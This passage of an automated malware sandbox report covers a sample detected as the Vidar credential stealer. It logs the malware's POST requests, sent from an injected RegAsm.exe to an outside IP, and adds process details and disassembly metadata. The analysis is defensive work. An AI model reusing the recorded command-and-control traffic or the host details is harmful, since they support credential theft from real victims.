2f 74 4b 31 2f 76 50 2f 33 7a 52 5a 39 68 57 5a 61 70 61 71 66 32 6c 61 48 48 7a 50 38 41 39 38 30 66 32 6c 61 66 33 6e 2f 37 35 70 Data Ascii: MH+3+VFmFi1KM2d1/1y/qKz9NOJ2/3afJqMRt5UTdl128j3BqtZ3CW8rM+cFccURi0mKxr0VV/tC3x1f8qT+0bf8AvN+VFmOxbzS5qn/aFtn7z/lS/wBo2395v++aLMLFqg9Kqf2ja/3m/wC+aP7Stv7zf980WY7Fuiqn9o2395/++aP7Rtv7z/8AfNFmFmW8+lLVMala/wB5/wDvml/tK1/vP/3zRZ9hWZapaqf2laHHzP8A980f2laf3n/75p
2024-04-23 19:44:28 UTC	16355	OUT	Data Raw: 42 2b 6f 2f 70 30 72 70 4f 32 4f 77 6c 42 70 65 6c 4e 36 2f 34 30 69 78 4f 70 6f 36 30 45 30 64 2f 57 67 6f 53 67 6a 38 61 50 38 61 53 67 41 2f 4b 6d 35 34 70 63 63 2f 38 41 31 71 51 39 4f 74 49 61 44 70 37 2f 41 49 30 6e 38 36 4f 53 50 77 6f 70 44 44 50 35 55 68 35 4e 42 35 70 44 30 6f 47 68 65 4b 51 2f 54 70 52 31 70 44 30 6f 47 4a 52 31 4e 48 41 6f 78 31 2f 70 51 4d 37 75 35 67 75 47 64 6e 74 70 49 46 4d 6b 52 68 6b 57 65 42 4a 6b 64 43 51 32 43 72 71 77 50 49 42 36 64 71 7a 4a 64 43 75 62 70 37 6e 37 58 65 43 57 4b 36 61 4a 70 6f 2f 4c 55 4c 2b 37 42 43 42 51 42 38 6f 55 4d 51 46 58 41 35 36 56 75 30 56 78 54 77 6c 47 70 4c 6e 6c 47 37 50 6e 4b 57 59 59 6d 6c 54 39 6e 43 62 53 4d 69 36 30 33 55 4c 31 46 74 72 6e 55 6d 6b 73 31 67 53 32 45 62 52 72 6e Data Ascii: B+o/p0rpO2OwlBpelN6/40ixOpo60E0d/WgoSgj8aP8aSgA/Km54pcc/8A1qQ9OtIaDp7/AI0n86OSPwopDDP5Uh5NB5pD0oGheKQ/TpR1pD0oGJR1NHAox1/pQM7u5guGdntpIFMkRhkWeBJkdCQ2CrqwPIB6dqzJdCubp7n7XeCWK6aJpo/LUL+7BCBQB8oUMQFXA56Vu0VxTwlGpLnlG7PnKWYYmlT9nCbSMi603UL1FtrnUmks1gS2EbRrn
2024-04-23 19:44:28 UTC	16355	OUT	Data Raw: 72 6d 65 4f 2b 73 37 6e 37 4e 67 7a 70 62 75 78 5a 42 6e 47 63 6c 51 47 41 4a 41 4a 55 73 4f 66 54 6d 6a 36 31 52 76 62 6d 44 2b 7a 38 54 61 2f 49 79 53 69 6f 4a 4c 6c 59 70 64 51 52 6d 69 4a 73 4c 6c 62 61 62 44 48 6c 32 33 59 78 78 30 2b 51 39 63 56 4f 6f 4c 7a 77 51 71 56 44 7a 79 72 45 6d 34 34 47 35 6a 67 5a 71 34 56 36 63 34 75 55 58 6f 6a 4f 70 68 71 74 4f 53 68 4f 4e 6d 77 70 47 47 35 53 50 55 59 71 47 33 75 6f 4c 6e 54 6f 62 75 4f 37 74 53 38 38 45 74 78 46 62 62 33 38 32 52 49 69 77 63 6a 35 64 76 47 78 6a 6a 64 6e 41 70 66 50 38 41 33 59 6b 4a 6a 32 4e 44 44 4a 47 63 6b 2b 59 30 71 68 6f 34 31 41 47 53 35 42 36 44 6a 31 4f 4b 79 65 4c 77 38 6b 34 38 78 30 4c 4c 73 5a 54 6b 70 63 6a 75 6a 76 66 2b 46 6a 50 2f 41 4e 41 68 66 2f 41 72 2f 77 43 77 Data Ascii: rmeO+s7n7NgzpbuxZBnGclQGAJAJUsOfTmj61RvbmD+z8Ta/IySioJLlYpdQRmiJsLlbabDHl23Yxx0+Q9cVOoLzwQqVDzyrEm44G5jgZq4V6c4uUXojOphqtOShONmwpGG5SPUYqG3uoLnTobuO7tS88EtxFbb382RIiwcj5dvGxjjdnApfP8A3YkJj2NDDJGck+Y0qho41AGS5B6Dj1OKyeLw8k48x0LLsZTkpcjujvf+FjP/ANAhf/Ar/wCw
2024-04-23 19:44:28 UTC	8328	OUT	Data Raw: 41 50 37 4d 2f 76 66 68 2f 77 41 45 39 43 36 6d 69 76 50 61 53 6c 2f 61 2f 77 44 63 2f 48 2f 67 42 2f 5a 6e 39 37 38 50 2b 43 65 68 55 56 35 37 52 54 2f 74 66 2b 35 2b 50 2f 41 48 2f 5a 76 39 37 38 50 2b 43 65 67 6d 69 76 50 71 4b 50 37 58 2f 75 66 6a 2f 77 41 41 50 37 4e 2f 76 66 68 2f 77 54 30 43 67 31 77 41 42 4a 41 41 4a 4a 34 41 46 61 38 76 68 4c 78 4a 42 4c 46 46 4e 34 65 31 57 4f 53 62 50 6c 4b 39 6c 49 43 2b 42 6b 37 51 52 7a 67 63 38 64 71 58 39 73 66 33 50 78 2f 34 41 31 6c 76 39 37 38 50 2b 43 64 4f 66 2f 31 55 56 77 71 32 74 77 39 72 4a 64 4a 42 4b 31 76 45 77 57 53 55 49 53 69 45 35 77 43 65 67 4a 77 63 66 51 31 62 76 4e 42 31 6a 54 72 4b 4b 38 76 74 4a 76 72 61 31 6c 77 49 35 35 37 64 30 52 38 6a 49 77 78 47 44 6b 63 30 66 32 76 2f 41 48 50 Data Ascii: AP7M/vfh/wAE9C6mivPaSl/a/wDc/H/gB/Zn978P+CehUV57RT/tf+5+P/AH/Zv978P+CegmivPqKP7X/ufj/wAAP7N/vfh/wT0Cg1wABJAAJJ4AFa8vhLxJBLFFN4e1WOSbPlK9lIC+Bk7QRzgc8dqX9sf3Px/4A1lv978P+CdOf/1UVwq2tw9rJdJBK1vEwWSUISiE5wCegJwcfQ1bvNB1jTrKK8vtJvra1lwI557d0R8jIwxGDkc0f2v/AHP
2024-04-23 19:44:30 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 23 Apr 2024 19:44:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-23 19:44:30 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	49730	95.217.244.99	443	2632	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-23 19:44:31 UTC	262	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBFBGCGIJKJJKFIDBFCG User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.244.99 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-04-23 19:44:31 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 32 33 61 61 36 36 33 35 62 30 32 62 32 35 64 33 33 30 66 32 31 30 64 64 39 38 32 37 62 62 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 47 0d 0a 43 6f 6e 74 Data Ascii: ------CBFBGCGIJKJJKFIDBFCGContent-Disposition: form-data; name="token"9523aa6635b02b25d330f210dd9827bb------CBFBGCGIJKJJKFIDBFCGContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------CBFBGCGIJKJJKFIDBFCGCont
2024-04-23 19:44:31 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 23 Apr 2024 19:44:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-23 19:44:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	49731	95.217.244.99	443	2632	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-23 19:44:32 UTC	262	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFBGDGIDBAAEBFHJKJDG User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.244.99 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-04-23 19:44:32 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 46 42 47 44 47 49 44 42 41 41 45 42 46 48 4a 4b 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 32 33 61 61 36 36 33 35 62 30 32 62 32 35 64 33 33 30 66 32 31 30 64 64 39 38 32 37 62 62 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 47 44 47 49 44 42 41 41 45 42 46 48 4a 4b 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 47 44 47 49 44 42 41 41 45 42 46 48 4a 4b 4a 44 47 0d 0a 43 6f 6e 74 Data Ascii: ------BFBGDGIDBAAEBFHJKJDGContent-Disposition: form-data; name="token"9523aa6635b02b25d330f210dd9827bb------BFBGDGIDBAAEBFHJKJDGContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------BFBGDGIDBAAEBFHJKJDGCont
2024-04-23 19:44:33 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 23 Apr 2024 19:44:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-23 19:44:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	21:43:53
Start date:	23/04/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x450000
File size:	1'135'104 bytes
MD5 hash:	C7CB10EADCCA31C88538F972FD657590
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	21:43:53
Start date:	23/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xee0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	21:43:53
Start date:	23/04/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 356
Imagebase:	0x6f0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	0.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	6
Total number of Limit Nodes:	0

Executed Functions

Function 0046D1B0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 273
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(000000FF,00553018,000004AC,00000040,?,?), ref: 0046D2D9
GlobalFree.KERNELBASE(00000000), ref: 0046D31B
RegEnableReflectionKey.ADVAPI32(00000000), ref: 0046D323

Strings

A, xrefs: 0046D1EF
O, xrefs: 0046D1C6

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID: EnableFreeGlobalProtectReflectionVirtual
String ID: A$O
API String ID: 99888042-2576515906
Opcode ID: fc12df978631e20c7fd83328fe4f12caf4c6d419f1725b2de0f681d49c4aba81
Instruction ID: 5e87df59d59c7f211764bf590a7e83237b9146c70052bfb6fd64d7421239ad96
Opcode Fuzzy Hash: fc12df978631e20c7fd83328fe4f12caf4c6d419f1725b2de0f681d49c4aba81
Instruction Fuzzy Hash: BB51D571E00304AFDB00DFA4CC45BAEB7B0BF59305F14425AF905A7292EB74AA88DB55

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004F39CA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 004F3A63
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 004F3A8C
GetACP.KERNEL32 ref: 004F3AA1

Strings

OCP, xrefs: 004F3A1E
ACP, xrefs: 004F39E8

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: bc46fceabc0627a590841cbfc670d23a7b43a8bb3251792e7d8635b8c6e57a83
Instruction ID: 3766f62bc86efbd7ad8fddb2b1f66c0cdae23b120c92d34bd2fedbcf617f469f
Opcode Fuzzy Hash: bc46fceabc0627a590841cbfc670d23a7b43a8bb3251792e7d8635b8c6e57a83
Instruction Fuzzy Hash: AD21D672F00108AADB34CF56C900AB773A6AB50F52B568026EB8AD7310F736DF41C754

Uniqueness

Uniqueness Score: -1.00%

Function 004F3C13 Relevance: 7.7, APIs: 5, Instructions: 183
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserDefaultLCID.KERNEL32 ref: 004F3D1F
IsValidCodePage.KERNEL32(00000000), ref: 004F3D68
IsValidLocale.KERNEL32(?,00000001), ref: 004F3D77
GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004F3DBF
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 004F3DDE

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID: Locale$InfoValid$CodeDefaultPageUser
String ID:
API String ID: 3475089800-0
Opcode ID: 5cf7db4145e4032dbf6df8f735dfca5b74d3de87e1908553ea509182de649dba
Instruction ID: dd92aec6972557c5ea7570e73a193ef1bbafe7b0eef3aaa2d457ce8090588483
Opcode Fuzzy Hash: 5cf7db4145e4032dbf6df8f735dfca5b74d3de87e1908553ea509182de649dba
Instruction Fuzzy Hash: 8F519172A0020DABEB10DFA5DC41ABB77B8EF44702F04442AEA05EB291D7789B45CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004F6B8F Relevance: 7.4, Strings: 4, Instructions: 2437COMMON

Download Yara Rule

Strings

1#SNAN, xrefs: 004F6C9B
1#IND, xrefs: 004F6C94
1#QNAN, xrefs: 004F6CA2
1#INF, xrefs: 004F6CC5

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 0-2761157908
Opcode ID: cc6e17db20f6a6b70f9e3b4120f22d071ffd4ae76a386f84ae8120e622ee9101
Instruction ID: d1bfef63d338fc6042ebb7b97e80c5b83f8cf25296f15e08dedc2166a2ed1639
Opcode Fuzzy Hash: cc6e17db20f6a6b70f9e3b4120f22d071ffd4ae76a386f84ae8120e622ee9101
Instruction Fuzzy Hash: 8FD22572E0822C8BDB65CE28CD407EAB7B5EB44305F1441EAD94DE7240EB7CAE858F45

Uniqueness

Uniqueness Score: -1.00%

Function 004F3037 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 377COMMON

Download Yara Rule

APIs

GetACP.KERNEL32 ref: 004F30F8
IsValidCodePage.KERNEL32(00000000), ref: 004F3123
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 004F3304

Strings

utf8, xrefs: 004F31F5

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID: CodeInfoLocalePageValid
String ID: utf8
API String ID: 790303815-905460609
Opcode ID: 9b674373b97886307bd62c4105cb1ff41c02340a7c4246cfa8eca2f322ee2527
Instruction ID: 9908c1145b6cf321fad8a1ab99bd7acd835e7a2d31e5f607ce554f9be6648a9c
Opcode Fuzzy Hash: 9b674373b97886307bd62c4105cb1ff41c02340a7c4246cfa8eca2f322ee2527
Instruction Fuzzy Hash: C5710871640209AAD724AF76CD46BB773E8EF44706F10406BFA05D7281EA78EE448769

Uniqueness

Uniqueness Score: -1.00%

Function 00452CAC Relevance: 7.3, Strings: 5, Instructions: 1096COMMON

Download Yara Rule

Strings

true, xrefs: 00467358, 00467592
., xrefs: 004675A9
,, xrefs: 004675EE
false, xrefs: 00467332, 0046757B
bad locale name, xrefs: 00466E38, 00466FB4, 004670DF, 004671EF, 004673A9, 00467660

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID:
String ID: ,$.$bad locale name$false$true
API String ID: 0-3659324578
Opcode ID: ccc80f4400559415ba162a0e40f65fb29b6e4d81a3fcbe2d35464d1b223d7450
Instruction ID: 567e8a576c56147450551ae8ac51724e0e778e9cf26b25d8ce53ee28b7a4a5d1
Opcode Fuzzy Hash: ccc80f4400559415ba162a0e40f65fb29b6e4d81a3fcbe2d35464d1b223d7450
Instruction Fuzzy Hash: 3422BB715083808FD320DF69C880B5BBBE4BF99704F54491EF8889B252E779D948CB97

Uniqueness

Uniqueness Score: -1.00%

Function 0049FDC8 Relevance: 6.2, Strings: 4, Instructions: 1201COMMON

Download Yara Rule

Strings

8P, xrefs: 0049FFB9, 0049FFC3
/, xrefs: 004A070C
8P, xrefs: 004A03E4
@P, xrefs: 004A02F5

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID:
String ID: /$8P$8P$@P
API String ID: 0-2506659036
Opcode ID: 8431f7e6f095686899eb3b2d14f4e89cb10a683d6166a12c9209fd9b27300e9c
Instruction ID: b842c9fec96c543fd7e63e00b4023d00e0ca8ed58626dbe622731d3b1a74a399
Opcode Fuzzy Hash: 8431f7e6f095686899eb3b2d14f4e89cb10a683d6166a12c9209fd9b27300e9c
Instruction Fuzzy Hash: 499283B2E106099BDB14DEA9CC95BEE77B4AB25344F04413FE902E7281EB7CD909CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004EE007 Relevance: 6.1, APIs: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,00000000,?,00000000), ref: 004EE0A2
FindNextFileW.KERNEL32(00000000,?), ref: 004EE11D
FindClose.KERNEL32(00000000), ref: 004EE13F
FindClose.KERNEL32(00000000), ref: 004EE162

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
